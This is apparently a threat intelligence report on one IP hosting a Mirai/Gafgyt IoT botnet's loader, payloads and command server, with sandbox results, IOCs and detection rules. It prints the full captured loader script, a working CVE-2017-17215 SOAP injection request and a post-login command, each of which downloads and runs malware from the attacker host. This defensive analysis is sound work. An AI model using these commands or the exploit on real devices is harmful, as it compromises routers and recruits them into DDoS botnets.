TLP:CLEAR

Mirai/Gafgyt multi-arch loader — 94.183.232.247

One self-hosted node serving loader, payloads, and command-and-control for over a month — CVE-2017-17215 exploitation confirmed, live C2 channel confirmed in sandbox, no commands observed

Published 2026-07-05 Source Distributed SSH/Telnet Honeypot Fleet Confidence MEDIUM Classification Mirai/Gafgyt Hybrid — Multi-Arch IoT Botnet Loader

Executive summary

Most IoT botnet infrastructure we see splits the job three ways: one host delivers the exploit, a second serves the payloads, a third runs command-and-control. This one doesn't bother. A single IP, 94.183.232.247, has spent over a month as the exploit target, the loader, the payload host, and the C2 endpoint all at once — and it's still doing all four jobs as of this writing.

Key Finding
Between 2026-06-05 and 2026-07-04, our distributed honeypot fleet captured 81 unique payload samples served directly from 94.183.232.247, spanning 10 CPU architectures behind a classic Mirai-style bins.sh multi-fallback loader script. Delivery came from at least two distinct vectors: a Huawei HG532 router RCE (CVE-2017-17215) observed once directly against a lure sensor — the captured request shows no login step preceding it — and plain post-login shell commands following what looks like credential brute force. We independently detonated 20 of these samples (10 architectures × 2 recent seeding waves) in an automated 12-hour sandbox. All 20 confirmed a live TCP connection to 94.183.232.247:6772 — a non-standard port, not HTTP or DNS — but 9 of them sat connected and silent for the entire 12-hour window with no command ever pushed.

VirusTotal classifies every architecture we submitted as a Mirai/Gafgyt hybrid (33–38 of 62–64 engines flagging each sample), consistent with a commodity IoT DDoS botnet rather than a novel family. We found no public write-up naming this specific node or loader; RDAP shows the netblock was registered under a Hong Kong-registered entity on 2025-10-15, well before this loader activity began.

81
Unique Samples Served
10
CPU Architectures
30d
Observed Active Span
20
Samples Detonated
9/20
Silent 12h C2 Sessions
38/64
Peak VT Detections

Threat actor profile

No named threat actor or public campaign write-up was found matching this node's binary-naming convention, loader script, or C2 port. The operator has not been attributed.

Infrastructure Assessment
Collapsing exploit target, loader, payload host, and C2 onto one IP is operationally cheap but fragile — a single takedown or blocklist entry removes the entire chain at once. That tradeoff, combined with a commodity Mirai/Gafgyt VT classification and a plain, undisguised bins.sh loader (no packing, no sandbox-evasion checks observed in the script itself), points to a lower-effort, opportunistic operation rather than a resilience-conscious one. The multiple distinct binary-naming waves served from the same IP over the observed month — an uppercase set (ARMV7L, I586, ...), a differently-prefixed set (CRY.arm, CRY.mips, ...), and a lowercase set (arm, mips, ...) — suggest either one operator repeatedly rebuilding the same loader, or the host being reused/shared across more than one loader deployment.
AttributeAssessmentConfidence
Motivation Consistent with DDoS botnet recruitment (Mirai/Gafgyt lineage per VT classification); no DDoS tasking was directly observed in our sandbox runs MED
Sophistication Low-to-intermediate — classic unobfuscated shell loader, no packing observed, but broad 10-architecture coverage and a working self-hosted C2 HIGH
Attribution Unknown; no named threat actor or public research found referencing this IP or loader naming pattern MED
Target profile Opportunistic IoT/router devices — at least one confirmed Huawei HG532 RCE exploit, plus generic SSH/Telnet-reachable Linux hosts across 10 CPU architectures (ARM, Intel x86, MIPS LE/BE, SH4, x86-64, M68K, PowerPC, SPARC, ARC) HIGH
Operational tempo Recurring re-seeding roughly every few days across a full month of observation, with two dense seeding waves (2026-06-30 and 2026-07-03) in the most recent week HIGH

Infrastructure analysis

Exploit source ────────── CVE-2017-17215 (Huawei HG532 SOAP UPnP RCE) + direct SSH/Telnet post-login shell
94.183.232.247 (single source IP for every observed event)
wget http://94.183.232.247/Ciabins.sh (loader stage)
tries 5 fallback dirs, then loops through 14 architecture-fetch lines
all served from the same host; open directory listing separately returned 14 items
fetch + chmod +x + execute, per architecture
94.183.232.247 : 6772
persistent TCP connection, non-standard port
bot → connects, resolv.conf write observed, then silent
(9 of 20 sandboxed sessions: zero commands over 12h)

Distribution host

Same Node — Exploit Target, Loader, and C2
Every exploitation attempt, every payload fetch, and every confirmed C2 connection across this entire investigation resolves to the single IP 94.183.232.247. An automated open-directory probe against the host returned HTTP 200 with 14 listed files. Separately, the captured loader script itself contains 14 architecture-fetch lines (10 CPU architectures, with ARM and Intel x86 each split across multiple sub-variant filenames). We can't confirm the directory listing and the script's fetch list are the identical 14 files — the probe records a count, not filenames — but the two numbers landing on the same figure is a reasonable coincidence given the loader is the thing populating that directory.
AttributeValue
IP94.183.232.247
Netblock (RDAP)94.183.232.0/24, name CloudBackbone
Registrant (RDAP)CGI GLOBAL LIMITED (Hong Kong); abuse contact CloudBackbone NOC (Estonia)
Netblock registered2025-10-15; last changed 2025-12-11 (per live RDAP query)
Roles observedExploit target for CVE-2017-17215 delivery; loader + payload distribution (open directory, 14 files); C2 on port 6772
Open directoryHTTP 200, 14 items listed at probe time

Malware analysis

Loader script (Ciabins.sh)

POSIX/bash, ~1.7–2.0 KB depending on capture (4 distinct hashes captured across the observed month — same structure, presumably rebuilt or re-templated between waves). No sandbox-evasion or anti-analysis logic was found in the script itself; it is a straightforward multi-directory, multi-architecture fetch-and-run loop:

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/MIPS; chmod +x MIPS; ./MIPS; rm -rf MIPS
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/MIPSEL; chmod +x MIPSEL; ./MIPSEL; rm -rf MIPSEL
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/SH4; chmod +x SH4; ./SH4; rm -rf SH4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/X86_64; chmod +x X86_64; ./X86_64; rm -rf X86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/I686; chmod +x I686; ./I686; rm -rf I686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/POWERPC; chmod +x POWERPC; ./POWERPC; rm -rf POWERPC
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/I586; chmod +x I586; ./I586; rm -rf I586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/M68K; chmod +x M68K; ./M68K; rm -rf M68K
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/SPARC; chmod +x SPARC; ./SPARC; rm -rf SPARC
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/ARMV4L; chmod +x ARMV4L; ./ARMV4L; rm -rf ARMV4L
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/ARMV5L; chmod +x ARMV5L; ./ARMV5L; rm -rf ARMV5L
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/ARMV6L; chmod +x ARMV6L; ./ARMV6L; rm -rf ARMV6L
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/ARMV7L; chmod +x ARMV7L; ./ARMV7L; rm -rf ARMV7L
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.183.232.247/ARC; chmod +x ARC; ./ARC; rm -rf ARC

Each line tries five fallback working directories in order, then fetches, marks executable, runs, and deletes a single architecture's binary before moving to the next — the textbook Mirai bins.sh shape. Directly-captured shell commands (not routed through this script) also fetched individual architectures on their own, e.g. cd /tmp;rm -rf ARMV7L; wget http://94.183.232.247/ARMV7L; chmod 777 ARMV7L; ./ARMV7L bww — the trailing bww argument is passed to the binary on every directly-observed command and is likely a botnet/build tag rather than a functional flag.

VirusTotal — one submission per architecture

We submitted one representative sample per architecture from the most recent seeding wave (2026-07-03) for classification. All six returned a live scan within the session:

ArchitectureSHA256VT DetectionsClassification
ARM (v7) c62a539e…913cea 35 / 62 trojan.mirai/gafgyt
Intel x86 (i686) c1af9c6d…5ba543277 38 / 64 trojan.mirai/gafgyt
MIPS (LE) a34d7aa8…25a00f5df 36 / 63 trojan.mirai/gafgyt
MIPS (BE) a3e695c3…6c72ba58e3b 33 / 62 trojan.gafgyt/mirai
Renesas SH4 5b4faea9…f6440eab 37 / 64 trojan.mirai/gafgyt
x86-64 8e189738…131ea5b521d9 37 / 63 trojan.mirai/gafgyt

The blended mirai/gafgyt label (and its reversed gafgyt/mirai variant on the MIPS-BE sample) reflects the two families' well-documented shared code lineage rather than any ambiguity introduced by this loader — commodity engines routinely can't cleanly separate the two on IoT ELF payloads.

Behavioral sandboxing (tria.ge)

We submitted the same six samples to tria.ge for dynamic analysis. Results varied sharply by architecture, which is itself informative:

Architecturetria.ge ResultScoreNotable Signatures / IOCs
ARM (v7) 260705-d5ltcag17y 7 Writes DNS resolver configuration; changes its process name; connects to 94.183.232.247
Intel x86 (i686) 260705-d5mqmscx5r 7 Same DNS-config-write + process-rename signatures; connects to 94.183.232.247
MIPS (LE) 260705-d5nmyacx6j 7 Above signatures, plus a tagged System Network Configuration Discovery (T1016) behavior; connects to 94.183.232.247
MIPS (BE) 260705-d5pj8scx6l 1 Behavioral run crashed (SIGSEGV in the emulated MIPS-BE sandbox); no runtime signal captured
Renesas SH4 260705-d5p6rsg17z 1 All four attempted sandbox backends (x86_64/ARM/MIPS-BE/MIPS-LE hosts) failed with exec format error or a crash — tria.ge has no native SH4 execution backend
x86-64 260705-d5q33ag171 7 DNS-config-write + process-rename signatures; connects to 94.183.232.247

The four samples that ran successfully (ARM, x86, MIPS-LE, x86-64) all independently connected outbound to 94.183.232.247 and wrote to the DNS resolver configuration — consistent behavior across otherwise-unrelated CPU architectures, which is exactly what a shared codebase compiled for multiple targets should produce. The two failures (MIPS-BE, SH4) are sandbox emulation gaps, not evidence about the malware itself — our own detonation pipeline, which uses purpose-built QEMU images per architecture rather than a general-purpose behavioral sandbox, successfully booted and executed all of these architectures (see below).

Sandbox detonation

Our own automated pipeline runs captured ELF samples in per-architecture QEMU images with monitored network egress, initially for a short window and then, if a live outbound connection persists, for a full 12-hour dwell. Two recent seeding waves from this host — 2026-06-30 and 2026-07-03 — produced 20 unique samples across 10 architectures that our sandbox images support (ARMv4–v7, Intel i586/i686, MIPS LE/BE, Renesas SH4, x86-64). Three architectures the loader also serves — M68K, PowerPC, and SPARC — were captured but have no corresponding sandbox image, so they were not detonated.

Live C2, No Commands Observed
Every one of the 20 detonated samples recorded an outbound connection to 94.183.232.247:6772 — a non-standard TCP port, not HTTP or DNS. 9 of 20 ran for the full 12-hour dwell budget with the connection held open and silent the entire time (exit_kind: c2_silent_bail, our pipeline's label for "connected, then nothing"); a further 2 of 20 ran the full 12 hours and exited normally without ever bailing on silence. The remaining runs were shorter (300-second) initial passes, most reaped by the sandbox's own timeout rather than any bot or C2 action. Across every detonation, in every run where our process tracer captured syscall activity, the sample opened /etc/resolv.conf and issued a connect on port 53 as part of its own runtime setup — consistent with the DNS-configuration-write behavior tria.ge flagged independently above — before or alongside the connection to port 6772.
Exit outcomeCountTypical run lengthNotes
c2_silent_bail912 hours (43,200s)Connected to 6772, zero bytes exchanged after connect, ran to full dwell budget
exited21 × 300s, 1 × 12 hoursRan to completion without a silence-triggered bail
killed / kill18300 secondsShort initial-pass runs, reaped by the sandbox's own timeout
exit1300 secondsShort initial-pass run

We treat the 9 fully-silent 12-hour sessions as confirmation that 94.183.232.247:6772 is a live, reachable C2 endpoint — not dead or sinkholed infrastructure — but not as evidence of active tasking during our observation window. It's consistent with either a C2 that pushes commands on a schedule we didn't catch, one gated on a check-in we don't perform, or simply an operator who wasn't actively directing this particular batch of bots during the ~30 hours our dwells covered.

Observed TTPs — MITRE ATT&CK

Exploit Public-Facing Application
CVE-2017-17215 — Huawei HG532 SOAP/UPnP command injection via NewStatusURL, captured once directly against a lure sensor
Brute Force
Directly-captured post-login shell commands are consistent with SSH/Telnet credential brute force preceding command execution
Unix Shell
Ciabins.sh loader and directly-captured one-line wget; chmod; ./binary commands
Ingress Tool Transfer
wget fetch of the loader script and per-architecture ELF payloads, all from the same host
System Network Configuration Discovery
Tagged directly by tria.ge on the MIPS-LE sample's behavioral run
Masquerading
"Changes its process name" observed on 4 of 6 tria.ge behavioral runs
Application Layer Protocol (Non-Standard Port)
Persistent TCP session to 94.183.232.247:6772 — not HTTP or DNS; protocol content not decoded, connection held silent in every sandbox run
Resource Hijacking
Inferred from Mirai/Gafgyt family classification (known DDoS-for-hire lineage); no DDoS tasking or flood behavior was directly observed in any of our 20 sandbox runs

Activity timeline

2025-10-15
Netblock containing 94.183.232.247 registered (per live RDAP query), predating all observed loader activity by roughly 8 months.
2026-06-05 15:54 UTC
First captured activity from this IP: a direct post-login shell command fetches and runs an ARMv7 binary (./ARMV7L bww) on one sensor. Within minutes, the fleet's chase pipeline independently retrieves all 13 architecture binaries plus Ciabins.sh from the same host.
2026-06-07 / 06-09 / 06-12 / 06-14 / 06-16 / 06-19 / 06-21 / 06-26
Recurring re-seeding from the same host under two additional naming conventions (CRY.<arch> and lowercase <arch>), plus standalone re-fetches of Ciabins.sh — a new distinct file hash each time.
2026-06-12 08:23 UTC
Only directly-observed exploit mechanism captured: CVE-2017-17215 against a Huawei HG532 lure, injecting a Ciabins.sh fetch-and-execute command via the SOAP NewStatusURL field.
2026-06-30 23:01–23:02 UTC
Dense seeding wave: 13 architecture binaries (no new loader script hash) captured from the host within roughly 40 seconds. 10 of the 13 match our sandbox's supported architectures and are detonated as short (300s) initial passes; none are promoted to a full dwell.
2026-07-03 16:08–16:20 UTC
Second dense seeding wave: 13 architecture binaries plus a new Ciabins.sh hash (14 items) captured within roughly 12 minutes.
2026-07-03 16:22–16:43 UTC
10 samples from this second wave (the architectures our sandbox supports) run an initial 300-second detonation pass each.
2026-07-03 18:32 UTC – 2026-07-04 06:02 UTC
All 10 samples from the second wave are promoted to a full 12-hour sandbox dwell; 9 of the 10 confirm a live but silent connection to 94.183.232.247:6772 for the entire window, the last completing at 06:02 UTC on 07-04.
2026-07-05 (report published)
No further samples or scan/exploit events from this IP observed since 2026-07-04 06:02 UTC as of publication — approximately 21 hours quiet at time of writing.

Exploit payload

CVE-2017-17215 — Huawei HG532 SOAP/UPnP RCE

CVE-2017-17215 is a command-injection vulnerability (CVSS 3.0: 8.8 HIGH) in the Huawei HG532 home router's UPnP SOAP service (port 37215), publicly associated with the Satori/Okiru Mirai variant's mass-exploitation wave in 2017. It remains a staple exploitation vector for commodity IoT botnets nearly a decade later. NVD's formal scoring lists a low privilege requirement, but the request we captured shows no preceding authentication step, consistent with how this CVE is exploited in the wild via the device's exposed UPnP interface. The captured request, decoded from the raw SOAP body:

<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(cd /tmp;rm -rf Ciabins.sh;wget http://94.183.232.247/Ciabins.sh;chmod +x Ciabins.sh)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

The command injection rides in the NewStatusURL field of a WANPPPConnection:1 Upgrade SOAP action, a well-documented shape for this CVE. The NewDownloadURL field's literal string HUAWEIUPNP is the CVE's canonical fingerprint marker, not a functional command.

Direct post-login command (credential brute force path)

Separately from the CVE, four sessions across four sensors captured this exact one-line command typed directly after a successful login:

cd /tmp;rm -rf ARMV7L; wget http://94.183.232.247/ARMV7L; chmod 777 ARMV7L; ./ARMV7L bww

This is the same distribution host, a different delivery path — no exploit is needed once an attacker already has a shell, which is consistent with credential brute force rather than a second CVE.

Indicators of compromise

Network IOCs

Exploit Source / Loader / Payload Host
94.183.232.247
Single IP for every role: exploit source, loader, distribution, C2
C2 Port
94.183.232.247:6772
Non-standard TCP port; confirmed live and reachable across 20 sandbox detonations
Loader Script URL
http://94.183.232.247/Ciabins.sh
4 distinct hashes captured across the observed month
Payload URL Pattern
http://94.183.232.247/<ARCH>
Uppercase (ARMV7L, I686, ...), CRY.<arch>, and lowercase naming waves all observed
Exploited CVE
CVE-2017-17215
Huawei HG532 SOAP UPnP RCE, port 37215, path /ctrlt/DeviceUpgrade_1

File IOCs — detonated samples (2026-07-03 wave, one per architecture)

SHA256ArchitectureSizeVT
c62a539ef0b524d81b3379a21d52f1b1799f39be30c107abb80c91159c913ceaARM (v7)141,628 B35/62
c1af9c6d656ba5b94c4a5a4f3e0bf58fa507df0a92772fa2242c67e5ba543277Intel x86 (i686)91,320 B38/64
a34d7aa860ddd60d571be3eb9b0c0a75a00d76a7285892ae66eaf3d25a00f5dfMIPS (LE)170,436 B36/63
a3e695c3a15b52b59c86875a9a5c47c0f932186b8433bb70ab4aa6c72ba58e3bMIPS (BE)170,436 B33/62
5b4faea96a95e9d448af8710a08e959eb6c0e01af9af630f50ec8417f6440eabRenesas SH4107,944 B37/64
8e1897382a75baf8d62f21fc5266e64d06fbc1bd5e209d0f1d35131ea5b521d9x86-6498,280 B37/63

These six are one representative per architecture from the most recent (2026-07-03) seeding wave. The remaining 14 detonated samples (four more ARM sub-variants and a matching set from the 2026-06-30 wave) share the same loader host, C2 endpoint, and VT classification pattern.

Mitigations and detection

ActionPriorityDetail
Patch or retire CVE-2017-17215-affected devices HIGH Huawei HG532 devices with UPnP exposed to the Internet should be patched, firewalled, or replaced — this vulnerability is nearly a decade old and still being actively exploited.
Block distribution/C2 host HIGH Block outbound traffic to 94.183.232.247 on all ports, particularly TCP/6772.
Restrict outbound wget/tftp on IoT/embedded devices MED Devices that don't need general Internet fetch capability should have it removed or firewalled at the network edge.
Alert on unexpected outbound TCP to non-standard high ports MED A long-lived, low-traffic TCP session on an unusual port (e.g. 6772) from an IoT/embedded device is a strong C2 indicator even without decoded protocol content.

Detection signatures

# Suricata/Snort — CVE-2017-17215 Huawei HG532 SOAP RCE attempt
alert http any any -> $HOME_NET any (msg:"CVE-2017-17215 Huawei HG532 SOAP RCE attempt"; \
  content:"/ctrlt/DeviceUpgrade_1"; http_uri; \
  content:"NewStatusURL"; http_client_body; \
  content:"WANPPPConnection"; http_client_body; \
  flow:established,to_server; sid:9930001; rev:1;)

# Suricata/Snort — loader payload delivery
alert http any any -> any any (msg:"Mirai/Gafgyt multi-arch loader download"; \
  content:"Ciabins.sh"; http_uri; \
  flow:established,to_server; sid:9930002; rev:1;)

# Suricata — outbound C2 beacon, non-standard port
alert tcp $HOME_NET any -> 94.183.232.247 6772 (msg:"Mirai/Gafgyt multi-arch loader C2 beacon"; \
  flow:established,to_server; sid:9930003; rev:1;)

Collection methodology

All data in this report was collected organically by a distributed SSH/Telnet honeypot fleet deployed across multiple cloud providers and geographic regions. Fleet nodes also run alternate-protocol lure daemons that capture exploitation attempts against commonly-targeted embedded-device services beyond SSH/Telnet, including the SOAP/UPnP endpoint used by CVE-2017-17215.

Captured payloads were fetched automatically by the fleet's ingest pipeline shortly after first observation. A subset covering every CPU architecture the sandbox supports was detonated in isolated, per-architecture QEMU environments with monitored network egress; no interaction with victim networks occurred beyond passive observation of traffic the samples themselves generated. VirusTotal and tria.ge lookups were performed via the fleet's own investigation tooling; RDAP data was queried live against the public RDAP bootstrap service.